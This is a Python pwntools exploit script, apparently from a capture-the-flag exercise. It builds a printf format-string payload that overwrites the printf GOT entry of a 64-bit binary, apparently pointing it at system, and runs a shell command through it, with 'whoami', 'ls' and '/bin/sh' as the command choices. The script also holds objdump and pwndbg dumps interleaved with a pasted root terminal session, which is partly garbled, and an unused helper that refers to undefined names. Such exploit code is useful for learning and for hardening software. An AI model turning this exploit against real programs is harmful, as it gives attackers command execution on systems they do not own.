Exploits
# 8d16362098c47e4628413f20f6e5dd8840bd804950cd6714bb56e6b4e87c40d0 | |
# fmtstr_payload() is not used here, it's more fun this way ;) | |
from pwn import * | |
import sys | |
# 64bit | |
def get_process(is_remote = False):
    """Return a pwntools tube for the target.

    With ``is_remote`` set, connect using ``REMOTE_PATH`` unpacked as the
    ``remote(...)`` arguments; otherwise spawn the local ``binary``.

    NOTE(review): neither ``REMOTE_PATH`` nor ``binary`` is defined anywhere
    in this file, and nothing below calls this helper — presumably a leftover
    from a template, so it would raise NameError if ever invoked.
    """
    if not is_remote:
        # Local run. The original kept a commented-out variant that launched
        # the binary through ld.path with LD_PRELOAD pointing at libc.path.
        return process(binary.path)
    return remote(*REMOTE_PATH)
""" | |
objdump -R ./executable | |
./executable: file format elf64-x86-64 | |
DYNAMIC RELOCATION RECORDS | |
OFFSET TYPE VALUE | |
0000000000601ff0 R_X86_64_GLOB_DAT __libc_start_main@GLIBC_2.2.5 | |
0000000000601ff8 R_X86_64_GLOB_DAT __gmon_start__ | |
0000000000602080 R_X86_64_COPY stdout@@GLIBC_2.2.5 | |
0000000000602090 R_X86_64_COPY stdin@@GLIBC_2.2.5 | |
0000000000602018 R_X86_64_JUMP_SLOT putchar@GLIBC_2.2.5 | |
0000000000602020 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5 | |
0000000000602028 R_X86_64_JUMP_SLOT __stack_chk_fail@GLIBC_2.4 | |
0000000000602030 R_X86_64_JUMP_SLOT setresgid@GLIBC_2.2.5 | |
0000000000602038 R_X86_64_JUMP_SLOT setbuf@GLIBC_2.2.5 | |
0000000000602040 R_X86_64_JUMP_SLOT system@GLIBC_2.2.5 | |
0000000000602048 R_X86_64_JUMP_SLOT printf@GLIBC_2.2.5 | |
0000000000602050 R_X86_64_JUMP_SLOT fgets@GLIBC_2.2.5 | |
0000000000602058 R_X86_64_JUMP_SLOT strcmp@GLIBC_2.2.5 | |
0000000000602060 R_X86_64_JUMP_SLOT getegid@GLIBC_2.2.5 | |
pwndbg> x/40x 0x0602040 │SyntaxError: invalid syntax | |
0x602040 <[email protected]>: 0x004006e6 0x00000000 0x004006f6 0x00000000 │root@kali-ctf:~/ctf/executable# python3 poc.py | |
0x602050 <[email protected]>: 0xf7e591b0 0x00007fff 0x00400716 0x00000000 │b'AAAAAAAA %24$p' | |
0x602060 <[email protected]>: 0xf7eb0120 0x00007fff 0x00000000 0x00000000 │root@kali-ctf:~/ctf/executable# | |
0x602070: 0x00000000 0x00000000 0x00000000 0x00000000 │root@kali-ctf:~/ctf/executable# python3 poc.py | |
0x602080 <stdout@@GLIBC_2.2.5>: 0xf7fa36c0 0x00007fff 0x00000000 0x00000000 │AAAAAAAA %24$proot@kali-ctf:~/ctf/executable# python3 poc.py > input | |
0x602090 <stdin@@GLIBC_2.2.5>: 0xf7fa29a0 0x00007fff 0x00000000 0x00000000 | |
pwndbg> disass 'system@plt' │AAAAAAAA %24$proot@kali-ctf:~/ctf/executable# python3 poc.py > input | |
Dump of assembler code for function system@plt: │root@kali-ctf:~/ctf/executable# cat input | |
0x00000000004006e0 <+0>: jmp QWORD PTR [rip+0x20195a] # 0x602040 <[email protected]> │AAAAAAAA %24$proot@kali-ctf:~/ctf/executable# cat input | |
0x00000000004006e6 <+6>: push 0x5 │AAAAAAAA %24$proot@kali-ctf:~/ctf/executable# python3 poc.py > input | |
0x00000000004006eb <+11>: jmp 0x400680 │root@kali-ctf:~/ctf/executable# cat input | |
End of assembler dump. │3 | |
pwndbg> | |
""" | |
# PREFIX = "ls;#"
PREFIX = "whoami;#"
# PREFIX = "/bin/sh#"
# The input line fed to the target binary, assembled from fixed-size pieces:
# PREFIX padded to exactly 8 bytes, 40 bytes of filler, two printf
# format-string write specifiers (%ln at positional argument 35, %hn at 36),
# then two little-endian 64-bit addresses. 0x602048 is the printf GOT slot
# shown in the objdump excerpt above; the %hn/%ln writes presumably resolve
# to these trailing addresses via the positional indices — not verifiable
# from this file alone.
# NOTE(review): a PREFIX longer than 8 characters makes `8 - len(PREFIX)`
# negative, so `b"B" * ...` silently yields b"" and the byte layout shifts.
# Defensive context: this input only does anything when the program passes
# user-controlled data to printf as the format string and its GOT is
# writable; `-Werror=format-security` catches the former at build time and
# Full RELRO (`-Wl,-z,relro,-z,now`) makes the GOT read-only after loading.
payload = [
    bytes(PREFIX,'utf-8'),
    b"B" * (8 - len(PREFIX)),  # pad the command fragment to 8 bytes
    b"B" * 40,
    bytes("...%16333x%OO$ln".replace('OO',str( 35 )),'utf-8'),
    bytes("...........%50907x%OO$hn".replace('OO',str( 36 )),'utf-8'),
    p64(0x0000000000602049),
    p64(0x0000000000602048),
]
# Sent first on its own line; presumably a menu choice (the pasted shell
# session above ends with a bare `3`).
selection = b"3\n"
payload = selection + b"".join(payload) + b"\n"
# Raw bytes, not text: the p64 values contain NUL and non-UTF-8 bytes, so
# print() would corrupt them. The pasted session redirects this to `input`.
sys.stdout.buffer.write(payload)